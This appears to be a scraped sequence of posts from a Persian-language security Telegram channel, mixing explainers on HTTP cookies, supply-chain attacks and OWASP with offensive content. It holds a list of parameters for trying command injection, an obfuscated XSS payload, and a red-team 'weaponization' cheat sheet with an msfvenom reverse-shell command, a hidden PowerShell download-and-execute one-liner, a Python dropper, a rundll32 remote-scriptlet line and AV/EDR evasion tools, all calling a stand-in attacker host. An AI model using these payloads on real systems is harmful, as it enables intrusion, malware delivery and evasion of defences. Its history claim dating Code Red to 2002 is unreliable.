به‌کارگیری روش‌های OSINT برای آشکارسازی احساسات و مودهای افراد

@TryHackBox

🔖 پارامترهایی که می‌توانید تزریق کامند را در آنها امتحان کنید.

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

@TryHackBox

🔐 حملات رایج زنجیره تأمین و روش‌های پیشگیری

مقدمه
امنیت زنجیره تأمین با افزایش وابستگی کسب‌وکارها به فناوری، به موضوعی حیاتی تبدیل شده است. شناخت انواع رایج حملات زنجیره تأمین و راهکارهای محافظتی ضروری است.

انواع حملات زنجیره تأمین
1️⃣ حمله مرد میانی (MITM)
- رهگیری ارتباطات بین دو طرف بدون آگاهی آن‌ها
- دستکاری داده‌ها برای دسترسی به اطلاعات حساس

2️⃣ حمله فیشینگ
- فریب کاربران برای افشای اطلاعات محرمانه مانند رمزعبور
- استفاده از ایمیل یا پیام‌های جعلی

3️⃣ دستکاری نرم‌افزار (Software Tampering)
- تغییر کد نرم‌افزار برای دسترسی به داده‌های حساس
- استفاده از کد دستکاری شده برای حمله به سیستم‌های دیگر

4️⃣ تزریق بدافزار (Malware Injection)
- وارد کردن کد مخرب به سیستم هدف (کامپیوتر یا موبایل)
- دسترسی به داده‌های حساس یا اجرای حملات دیگر

راهکارهای پیشگیری و کاهش
🔹 پیاده‌سازی اقدامات امنیتی قوی
- استفاده از فایروال، آنتی‌ویروس و سیستم‌های مانیتورینگ
- به‌روزرسانی منظم نرم‌افزارها

🔹 نظارت بر تأمین‌کنندگان سوم
- ارزیابی اقدامات امنیتی شرکای تجاری
- شناسایی و رفع آسیب‌پذیری‌های آن‌ها

🔹 آموزش کارکنان
- افزایش آگاهی درباره ریسک‌های امنیتی
- آموزش روش‌های ایمن کار با داده‌های حساس

🔹 استفاده از ارتباطات امن
- به کارگیری پروتکل‌های رمزنگاری شده
- محافظت در برابر حملات مرد میانی

تاریخچه حملات
- اولین حمله ثبت‌شده: حمله "Code Red" در سال ۲۰۰۲
- حملات مشهور: "Stuxnet" (۲۰۱۰) و "NotPetya" (۲۰۱۷)
- افزایش توجه به امنیت زنجیره تأمین در سال‌های اخیر

نتیجه‌گیری
با توجه به افزایش حملات زنجیره تأمین، کسب‌وکارها باید:
- سیستم‌های خود را به‌طور مستمر ارزیابی کنند
- از بهترین روش‌های امنیتی استفاده نمایند
- کارکنان را آموزش دهند

✍️نویسنده
@TryHackBox | The Chaos

#Supply_Chain #MITM #Cybersecurity

🚀 پارت 3 (A)

🍪 کوکی‌ها (Cookies) چیه و چه کاری انجام می‌دن؟

کوکی‌ها راهی برای شناسایی کاربران و ایجاد جلسات (Sessions) پایدار در وب هستند. در گذشته کاربران مشکلات فنی زیادی داشتند، اما کوکی‌ها به عنوان یک راه‌حل فنی برای ایجاد ارزش بیشتر به وجود اومدن.

🔹 تاریخچه مختصر:
کوکی‌ها رو اولین بار Netscape توسعه داد، اما امروز همه مرورگرهای اصلی ازشون پشتیبانی می‌کنن. اون‌ها بخش مهمی از پروتکل HTTP هستن و روی عملکرد حافظه نهان (Cache) مرورگر هم تاثیر می‌ذارن.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Cookies #CyberSecurity

🚀 پارت 3 (B)

🧠 چطوری کار می‌کنن؟
کوکی‌ها در واقع مثل برچسب‌های "اسم من ... است" (Hello, My Name Is) هستن که سرور اون‌ها رو به کاربر می‌چسبونه.
وقتی شما یک سایت رو باز می‌کنید، اون سایت می‌تونه تمام برچسب‌هایی (کوکی‌هایی) که خودش قبلاً برای شما گذاشته رو بخونه.

🔰 در اولین بازدید:
وقتی برای اولین بار به یک سایت سر می‌زنید، سرور هیچ اطلاعاتی درباره شما نداره. اما چون حدس می‌زنه دوباره برمی‌گردید، یک کوکی منحصر به فرد برای شما می‌سازه و via مرورگر براتون ذخیره می‌کنه. اینطوری می‌تونه دفعه بعد شما رو شناسایی کنه.

این کوکی از یک جفت نام=مقدار (مثلاً user_id=12345) تشکیل شده و سرور آن را با استفاده از هدرهای پاسخ HTTP مثل Set-Cookie برای مرورگر شما می‌فرسته.

🔹 انواع کوکی‌ها:
به طور کلی دو نوع اصلی داریم:

1️⃣ کوکی Session (موقت):
این کوکی موقته و فقط هنگام حرکت شما در یک سایت فعاله. با بستن مرورگر، این کوکی پاک میشه! برای ذخیره موقت ترجیحات و تنظیمات شما به کار میره.

2️⃣ کوکی Persistent (دائمی):
این کوکی‌ها ماندگاری بیشتری دارن و حتی بعد از بستن و باز کردن مجدد مرورگر هم باقی می‌مونن! از این کوکی‌ها معمولاً برای به خاطر سپردن اطلاعات لاگین، پروفایل و تنظیمات شخصی‌شده استفاده میشه.

🔹 تفاوت اصلی:
فرق اصلی این دو در زمان انقضاشونه. اگر کوکی دارای پارامترهای Expires یا Max-Age باشه (یا پارامتر Discard رو نداشته باشه)، یک کوکی Persistent محسوب میشه.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Cookies #CyberSecurity

📘 کتاب "وایرشارک برای رد‌تیمرها"
راهنمای تخصصی تحلیل شبکه برای هکرهای اخلاقی و تیم‌های قرمز

⚠️ توجه:
این فایل تنها نمونه‌ای از صفحات کتاب است و برخی مطالب و آموزش‌ ها به منظور حفظ اصالت اثر حذف شده‌اند. 
برای دریافت نسخه‌ی کامل و دسترسی به تمامی تمرین‌ها و سناریوها، می‌توانید کتاب را به صورت کامل خریداری کنید.

توضیحات کتاب و قیمت
توضیحات کامل
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport

Weaponization Cheat Sheet (Red Team)

اهداف این مرحله

آماده‌سازی فایل/کدی که بشه به تارگت تحویل داد.

ترکیب exploit + payload.

پنهان‌سازی تا حد امکان (AV/EDR bypass).





تکنیک‌های متداول

1. Exploit + Payload

استفاده از Metasploit msfvenom برای ساخت payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe

تزریق توی اسناد آفیس (Word/Excel):

VBA Macro payload

DDE Exploit





2. Phishing Attachments

فایل‌های weaponized:

.docm → ماکرو مخرب

.xlsm → ماکرو

.hta → ویندوز اسکریپت

.lnk → شورتکات با کد مخفی

.pdf → با جاوااسکریپت یا exploit

3. Web Delivery Payload

PowerShell One-Liner:

powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

Python Dropper:

import urllib.request, os
url = "http://ATTACKER/shell.exe"
urllib.request.urlretrieve(url, "update.exe")
os.system("update.exe")

4. Obfuscation / Evasion

AV bypass:

Shellcode obfuscation با donut یا scarecrow

String encoding (Base64, XOR, AES)


EDR bypass:

LOLBins (living-off-the-land binaries) مثل:

rundll32.exe
javanoscript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("noscript:http://ATTACKER/shell.sct")

5. Payload Hosting

وب‌سرور ساده:

python3 -m http.server 80

یا استفاده از ngrok برای تونل زدن.




ابزارهای مهم

msfvenom / Metasploit

Cobalt Strike (beacon generation)

Empire / Sliver C2

ScareCrow (AV evasion)

donut (shellcode loader)

macro_pack (ماکرو سازی خودکار برای آفیس)




نویسنده

@tryhackbox | arian momeni

🚀 پارت 4 (A)
🍪 کوکی‌ها (Cookies): از شناسایی تا ذخیره اطلاعات

در پست قبل راجع به اساسيات کوکی‌ها صحبت کردیم. حالا بپردازیم به جزئیات بیشتر!

🔢 چه اطلاعاتی در کوکی ذخیره می‌شود؟
کوکی‌ها می‌توانند حاوی هر اطلاعاتی باشند، اما اغلب شامل یک شماره شناسه منحصر به فرد (Unique ID) هستند که توسط سرور برای اهداف بازیابی استفاده می‌شود.
مثال: سرور یک کوکی با مقدار id=34294 برای کاربر قرار می‌دهد. سپس می‌تواند از این شماره برای جستجوی اطلاعات بیشتر کاربر (مانند تاریخچه خرید، آدرس و...) در پایگاه داده خودش استفاده کند.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Cookies #CyberSecurity

🔔 اطلاعیه

دوستان گرامی،
محتوای آموزشی این مجموعه با صرف زمان و تلاش فراوان تهیه می‌شود. متأسفانه در مواردی دیده شده که مطالب بدون ذکر منبع بازنشر شده‌اند.

ذکر منبع هنگام استفاده از محتوا، احترام به حقوق معنوی و تلاش تیم ماست و باعث می‌شود این روند آموزشی با انگیزه و استمرار بیشتری ادامه پیدا کند.

از همراهی و توجه شما سپاسگزاریم و امیدواریم دیگر شاهد چنین مواردی نباشیم.

@TryHackBox

👩‍💻 عملگرهای انتساب منطقی در JavaScript برای بهره‌برداری از XSS به عنوان یک مثال دیگر از اهمیت دور شدن از پیلودهای معمولی.

window&&=(window&&=opener||=alert)?.(1??0,)

#bugbounty #tips
@TryHackBox

🚀 پارت 4 (B)

📝 ذخیره مستقیم اطلاعات
با این حال، کوکی‌ها فقط به یک ID محدود نیستند. برخی سرورها انتخاب می‌کنند که اطلاعات را مستقیماً در کوکی نگه دارند. مثال:
Cookie: name="Brian Totty"; phone="555-1212"

🎒 کوله پشتی کاربر (Cookie Jar)
مرورگر، محتوای کوکی‌های ارسالی از سرور را در هدرهای Set-Cookie به خاطر می‌سپارد و مجموعه کوکی‌ها را در یک فضای ذخیره سازی به نام Cookie Jar ( like یک چمدان پر از برچسب های مختلف سرورها) ذخیره می کند.
وقتی کاربر در آینده به همان سایت بازگردد، مرورگر، کوکی‌های مربوط به آن سرور را انتخاب کرده و آن‌ها را در هدر درخواست Cookie ارسال می‌کند.

🎯 هدف اصلی کوکی‌ها: State Management
هدف اصلی کوکی‌ها این است که به مرورگر اجازه می‌دهند مجموعه‌ای از اطلاعات خاص یک سرور را جمع آوری کند و هر بار که کاربر آن سایت را باز می‌کند، این اطلاعات را به سرور ارائه دهد.
از آنجایی که وظیفه ذخیره اطلاعات کوکی بر عهده مرورگر است، به این سیستم اصطلاحاً مدیریت状态 سمت کلاینت (Client-Side State) می‌گویند. مشخصات رسمی کوکی‌ها با نام HTTP State Management Mechanism شناخته می‌شود.

📁 مرورگرها و ذخیره سازی کوکی‌ها
مرورگرهای مختلف، کوکی‌ها را به روش‌های مختلف ذخیره می‌کنند.
مرورگر Netscape Navigator کوکی‌ها را در یک فایل متنی به نام cookies.txt ذخیره می‌کند.
هر خط در این فایل نشان‌دهنده یک کوکی است و هفت فیلد دارد که با تب از هم جدا شده‌اند:

domain: دامنه‌ای که کوکی به آن تعلق دارد.

allh: اگر TRUE باشد، به این معنی است که همه میزبان‌های خاص در آن دامنه می‌توانند کوکی را دریافت کنند.

path: مسیری در دامنه که با کوکی مرتبط است.

secure: اگر TRUE باشد، کوکی فقط از طریق یک اتصال SSL امن ارسال می‌شود.

expiration: زمان انقضای کوکی به شکل ثانیه از 1 ژانویه 1970, 00:00:00 GMT (مبدأ زمان یونیکس).

name: نام متغیر کوکی.

value: مقدار متغیر کوکی.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Cookies #CyberSecurity

⭕️ ۱۰ آسیب‌ پذیری برتر OWASP

#OWASP #Top10 #Vulnerabilities
@TryHackBox | Github | YouTube | Group

⭕ ۹ نکته مطالعه OSCP برای کمک به موفقیت شما توسط OffSec
@TryHackBox | Github | YouTube | Group
#OSCP #OffSec

✏️ مقاله تالیف شده
Top 10 Most Dangerous Active Directory Attack Methods

📚برخی از سرفصل ها

📗بخش اول: Active Directory (AD)

📕بخش دوم: توضیح ۱۰ مورد از خطرناک‌ترین روش حمله به Active Directory
به همراه معرفی ابزار های هر مورد

📘بخش سوم : راهبردهای جامع برای افزایش امنیت Active Directory

🔖بخش چهارم : ساخت یک دفاع مقاوم در برابر حملات Active Directory


✍️نویسنده
@TryHackBox | The Chaos

#AD #Acrive_Directory #Cybersecurity